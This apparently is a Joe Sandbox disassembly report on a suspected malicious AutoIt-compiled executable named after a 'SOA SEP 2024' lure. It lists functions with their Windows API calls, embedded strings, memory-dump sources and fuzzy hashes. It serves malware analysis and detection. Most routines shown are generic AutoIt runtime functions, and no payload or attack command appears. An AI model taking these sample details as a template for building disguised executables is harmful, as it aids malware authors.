%s%u, xrefs: 0079D02C

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 18674a5bd6cd3d49d49d2ad6140f95b53645832f4e023cfd8999f0f33de6ee40
Instruction ID: db772e99135bd65fdd27e6379fe5c601e40e41f619116605fc97856d622f3f6d
Opcode Fuzzy Hash: 18674a5bd6cd3d49d49d2ad6140f95b53645832f4e023cfd8999f0f33de6ee40
Instruction Fuzzy Hash: CFA1D271604306EFDB25DF64D884BAAB7A8FF48350F008619F999D7190DB38ED46CBA1

Function 0079D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0079D8EB
_wcscmp.LIBCMT ref: 0079D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0079D924
CharUpperBuffW.USER32(?,00000000), ref: 0079D941
_wcscmp.LIBCMT ref: 0079D95F
_wcsstr.LIBCMT ref: 0079D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0079D9A8
_wcscmp.LIBCMT ref: 0079D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0079D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0079DA28
_wcscmp.LIBCMT ref: 0079DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0079DA60
GetWindowRect.USER32(00000004,?), ref: 0079DAC9

Strings

@, xrefs: 0079D8C6
ThumbnailClass, xrefs: 0079D9B3, 0079DA33

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 1e90fb1c7099cdfc02dccdf5be485a229c582deb73ed35a1b7698a1d5f467d75
Instruction ID: 91aecc4cd90b7d09bb823b9b0a41bae20ea6fb1dae8f6cc2217c52d914a9e667
Opcode Fuzzy Hash: 1e90fb1c7099cdfc02dccdf5be485a229c582deb73ed35a1b7698a1d5f467d75
Instruction Fuzzy Hash: B081D1710083459FDF21DF50D885FAA7BE8EF44314F04846AFD899A096DB38ED46CBA1

Function 0079D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0079D753

Strings

[REGEXPTITLE:, xrefs: 0079D77B
REGEXP=, xrefs: 0079D768
LAST, xrefs: 0079D718
[LAST, xrefs: 0079D800
ACTIVE, xrefs: 0079D72E
[HANDLE:, xrefs: 0079D75F
HANDLE=, xrefs: 0079D74C
[ACTIVE, xrefs: 0079D740
[ALL, xrefs: 0079D7F9
ALL, xrefs: 0079D7E7
CLASSNAME=, xrefs: 0079D790
[CLASS:, xrefs: 0079D7A3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 59100d047e8174e2e960ea97c099635f078e1e56a541d2027e355272833fbbfa
Instruction ID: dbb48557ddbd298f71bb350f63b9c8160ee6141272dc74f7b092924fe704d5db
Opcode Fuzzy Hash: 59100d047e8174e2e960ea97c099635f078e1e56a541d2027e355272833fbbfa
Instruction Fuzzy Hash: 78319231A48205EADF24FB50ED57EEDB3B8AF20710F600129F952F11D2EB5DAE64C651

Function 0079EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0079EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0079EAC2
SetWindowTextW.USER32(?,?), ref: 0079EAD9
GetDlgItem.USER32(?,000003EA), ref: 0079EAEE
SetWindowTextW.USER32(00000000,?), ref: 0079EAF4
GetDlgItem.USER32(?,000003E9), ref: 0079EB04
SetWindowTextW.USER32(00000000,?), ref: 0079EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0079EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079EB45
GetWindowRect.USER32(?,?), ref: 0079EB4E
SetWindowTextW.USER32(?,?), ref: 0079EBB9
GetDesktopWindow.USER32 ref: 0079EBBF
GetWindowRect.USER32(00000000), ref: 0079EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0079EC12
GetClientRect.USER32(?,?), ref: 0079EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0079EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0079EC6F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 3574aed86df2ec0f5dbdcdd5f955866c138f85037214016f4b1df6b99415ee25
Instruction ID: c82b62282e2633d126790859d0fb898191d0e92c976d2d30a96c4b440f8c162e
Opcode Fuzzy Hash: 3574aed86df2ec0f5dbdcdd5f955866c138f85037214016f4b1df6b99415ee25
Instruction Fuzzy Hash: 6F513C71900709EFDB21DFA8DD89E6EBBF5FF08705F008928E586A65A0D779A944CB10

Function 007B79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 007B79C6
LoadCursorW.USER32(00000000,00007F00), ref: 007B79D1
LoadCursorW.USER32(00000000,00007F03), ref: 007B79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 007B79E7
LoadCursorW.USER32(00000000,00007F01), ref: 007B79F2
LoadCursorW.USER32(00000000,00007F81), ref: 007B79FD
LoadCursorW.USER32(00000000,00007F88), ref: 007B7A08
LoadCursorW.USER32(00000000,00007F80), ref: 007B7A13
LoadCursorW.USER32(00000000,00007F86), ref: 007B7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 007B7A29
LoadCursorW.USER32(00000000,00007F85), ref: 007B7A34
LoadCursorW.USER32(00000000,00007F82), ref: 007B7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 007B7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 007B7A55
LoadCursorW.USER32(00000000,00007F02), ref: 007B7A60
LoadCursorW.USER32(00000000,00007F89), ref: 007B7A6B
GetCursorInfo.USER32(?), ref: 007B7A7B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 6be754854e0f40167fc8f003c251ad6ec5f84398e61bcd662be3348070dec4cc
Instruction ID: 331bafbe54a4d67f039d9f24f3045a167358ed0756713879dd377ad6cf8eb77f
Opcode Fuzzy Hash: 6be754854e0f40167fc8f003c251ad6ec5f84398e61bcd662be3348070dec4cc
Instruction Fuzzy Hash: A53117B0D083196ADB509FBA8C8999FBFE8FF44750F504526E50DE7280DA7CA500CFA1

Function 0076C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0077E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0076C8B7,?,00002000,?,?,00000000,?,0076419E,?,?,?,007FDC00), ref: 0077E984

Part of subcall function 0076660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007653B1,?,?,007661FF,?,00000000,00000001,00000000), ref: 0076662F

__wsplitpath.LIBCMT ref: 0076C93E

Part of subcall function 00781DFC: __wsplitpath_helper.LIBCMT ref: 00781E3C

_wcscpy.LIBCMT ref: 0076C953
_wcscat.LIBCMT ref: 0076C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0076C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0076CABE

Part of subcall function 0076B337: _wcscpy.LIBCMT ref: 0076B36F

Strings

Bad directive syntax error, xrefs: 007D3429
AU3!, xrefs: 0076C90C
Unterminated string, xrefs: 007D3470
EA06, xrefs: 007D30C9
#include depth exceeded. Make sure there are no recursive includes, xrefs: 007D3098
>>>AUTOIT SCRIPT<<<, xrefs: 007D311B
Error opening the file, xrefs: 007D30B4, 007D313D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: f5f8eaccbbad1fdb38e0dcb77b854e430acdda494542088f1bab5aedde3d288c
Instruction ID: 6bf4b2d3a747e27cf5957fbf2e1e54b69cc585310e377df0160ba18d9dbdf5d7
Opcode Fuzzy Hash: f5f8eaccbbad1fdb38e0dcb77b854e430acdda494542088f1bab5aedde3d288c
Instruction Fuzzy Hash: AD127971508341DFC725EF24C985AAEBBF5BF99300F04491EF98A93251DB38DA49CB52

Function 007CCE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007CCEFB
DestroyWindow.USER32(?,?), ref: 007CCF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007CCFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007CD016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CD025
DestroyWindow.USER32(?), ref: 007CD042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00760000,00000000), ref: 007CD075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007CD094
GetDesktopWindow.USER32 ref: 007CD0A9
GetWindowRect.USER32(00000000), ref: 007CD0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007CD0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007CD0DA

Part of subcall function 0077B526: GetWindowLongW.USER32(?,000000EB), ref: 0077B537

Strings

0, xrefs: 007CCF1B
tooltips_class32, xrefs: 007CCFED, 007CD06E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: aceda4151dfb38b11dee1a221bdc8184910522e69f2c900fc5810c6c36f8eb34
Instruction ID: 54de9bb709ca180155bd9aae04a57832cf022a2675a4bd3113fcad6bda29e8ea
Opcode Fuzzy Hash: aceda4151dfb38b11dee1a221bdc8184910522e69f2c900fc5810c6c36f8eb34
Instruction Fuzzy Hash: 8D719EB0140249AFDB20CF28CC85F6A77E5FB98704F14852DF985872A1D778ED86CB16

Function 007CF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

DragQueryPoint.SHELL32(?,?), ref: 007CF37A

Part of subcall function 007CD7DE: ClientToScreen.USER32(?,?), ref: 007CD807
Part of subcall function 007CD7DE: GetWindowRect.USER32(?,?), ref: 007CD87D
Part of subcall function 007CD7DE: PtInRect.USER32(?,?,007CED5A), ref: 007CD88D

SendMessageW.USER32(?,000000B0,?,?), ref: 007CF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007CF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007CF411
_wcscat.LIBCMT ref: 007CF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 007CF458
SendMessageW.USER32(?,000000B0,?,?), ref: 007CF471
SendMessageW.USER32(?,000000B1,?,?), ref: 007CF488
SendMessageW.USER32(?,000000B1,?,?), ref: 007CF4AA
DragFinish.SHELL32(?), ref: 007CF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007CF59C

Strings

@GUI_DROPID, xrefs: 007CF4D1
@GUI_DRAGFILE, xrefs: 007CF54B
@GUI_DRAGID, xrefs: 007CF510

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 7387fe1b47bdcadf9299b2f6174c28eeb06ff0f427ee804e0cde1255284439a1
Instruction ID: 45fdb3c4efae9b2bf919ce036b31adde744266a772e002eb63e5e48b22e2cf8b
Opcode Fuzzy Hash: 7387fe1b47bdcadf9299b2f6174c28eeb06ff0f427ee804e0cde1255284439a1
Instruction Fuzzy Hash: 2D616A71108340AFC711EF60DC89EAFBBE8FF99750F004A1EF595961A1DB749A09CB52

Function 007AAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 007AAB3D
VariantCopy.OLEAUT32(?,?), ref: 007AAB46
VariantClear.OLEAUT32(?), ref: 007AAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007AAC40
__swprintf.LIBCMT ref: 007AAC70
VarR8FromDec.OLEAUT32(?,?), ref: 007AAC9C
VariantInit.OLEAUT32(?), ref: 007AAD4D
SysFreeString.OLEAUT32(00000016), ref: 007AADDF
VariantClear.OLEAUT32(?), ref: 007AAE35
VariantClear.OLEAUT32(?), ref: 007AAE44
VariantInit.OLEAUT32(00000000), ref: 007AAE80

Strings

Default, xrefs: 007AACFD
%4d%02d%02d%02d%02d%02d, xrefs: 007AAC6A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: fa049a71092ccdbcf7bd2b18f590729be374583d7c1be20ced4598af8ab862c8
Instruction ID: bef1aafb53a16b4c82beabbc4275a6402dbbb640601149fdc5fe62c1b1f41058
Opcode Fuzzy Hash: fa049a71092ccdbcf7bd2b18f590729be374583d7c1be20ced4598af8ab862c8
Instruction Fuzzy Hash: 26D1DFB1A04205FBDB209F65C889B6AB7B5FF86700F148655E8059B1C1DB7CEC50DBA3

Function 007C716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007C71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C7247

Strings

GETTEXT, xrefs: 007C7382
EXPAND, xrefs: 007C72E1
GETITEMCOUNT, xrefs: 007C7311
EXISTS, xrefs: 007C72B0
UNCHECK, xrefs: 007C740B
COLLAPSE, xrefs: 007C728D
CHECK, xrefs: 007C7267
GETSELECTED, xrefs: 007C733F
ISCHECKED, xrefs: 007C73B2
SELECT, xrefs: 007C73E0
GETTOTALCOUNT, xrefs: 007C722A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: d1091093f33c7e3c753dca4066b9ef542d95671a46537a858efbf55fd4a4b904
Instruction ID: f41f7bcf5009711443d7090331ec1be62bacbbcf16acf327933a052cc5a552c4
Opcode Fuzzy Hash: d1091093f33c7e3c753dca4066b9ef542d95671a46537a858efbf55fd4a4b904
Instruction Fuzzy Hash: 8B916F74204641DBCF09EF10C845A6EB7A9BF94350F05885CBD9A6B393DB38ED4ACB91

Function 007CE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007CE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007CBEAF), ref: 007CE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007CE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,007CBEAF), ref: 007CE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007CE6DF
DestroyIcon.USER32(?,?,?,?,?,007CBEAF), ref: 007CE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007CE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007CE717

Part of subcall function 00780FA7: __wcsicmp_l.LIBCMT ref: 00781030

Strings

.exe, xrefs: 007CE541
.dll, xrefs: 007CE564
.icl, xrefs: 007CE521

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 4268c5d93e179f471f464006447762378922f118ec7252760c2b1d02c41fb7f1
Instruction ID: 00a9203d01d74e412dfa2d8974cd9322a2d6c2401f4dc6621487810df1f6c267
Opcode Fuzzy Hash: 4268c5d93e179f471f464006447762378922f118ec7252760c2b1d02c41fb7f1
Instruction Fuzzy Hash: E461D271550215FAEB20DF64CC86FFE7BA8BB18724F108109F911EA1D0EB789E90C7A0

Function 007AD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

CharLowerBuffW.USER32(?,?), ref: 007AD292
GetDriveTypeW.KERNEL32 ref: 007AD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007AD38C

Strings

closed, xrefs: 007AD2A6, 007AD2AF
set cd door , xrefs: 007AD32D
close cd wait, xrefs: 007AD377
open , xrefs: 007AD2EE
wait, xrefs: 007AD349
close, xrefs: 007AD298
open, xrefs: 007AD2B9
type cdaudio alias cd wait, xrefs: 007AD30A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 8667d7e2986226b1e04cc9feca117a77379ab6b4066d0352082037346a2da20a
Instruction ID: 545a109d314147f45f96ababc95fd6c3b0d87a3773b0bfde8378c6ef93179a2f
Opcode Fuzzy Hash: 8667d7e2986226b1e04cc9feca117a77379ab6b4066d0352082037346a2da20a
Instruction Fuzzy Hash: FD514B71104704DFC700EF10C88596AB7E8FF99754F00895CF89AA72A1DB39EE0ACB52

Function 007A26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,007D3973,00000016,0000138C,00000016,?,00000016,007FDDB4,00000000,?), ref: 007A26F1
LoadStringW.USER32(00000000,?,007D3973,00000016), ref: 007A26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,007D3973,00000016,0000138C,00000016,?,00000016,007FDDB4,00000000,?,00000016), ref: 007A271C
LoadStringW.USER32(00000000,?,007D3973,00000016), ref: 007A271F
__swprintf.LIBCMT ref: 007A276F
__swprintf.LIBCMT ref: 007A2780
_wprintf.LIBCMT ref: 007A2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A2840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007A2824
Line %d:, xrefs: 007A277A
Error: , xrefs: 007A27F7
^ ERROR, xrefs: 007A27D5
Line %d (File "%s"):, xrefs: 007A2769

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 48b262989dbf4db15c658c3b2ec90bc2f90973690a2e88f09be38fd5f3c5540b
Instruction ID: 8ec3506c0c9f27278e1d237b78b542fdf42dbdfcc04ca8d1ba97c4456e3ab5d9
Opcode Fuzzy Hash: 48b262989dbf4db15c658c3b2ec90bc2f90973690a2e88f09be38fd5f3c5540b
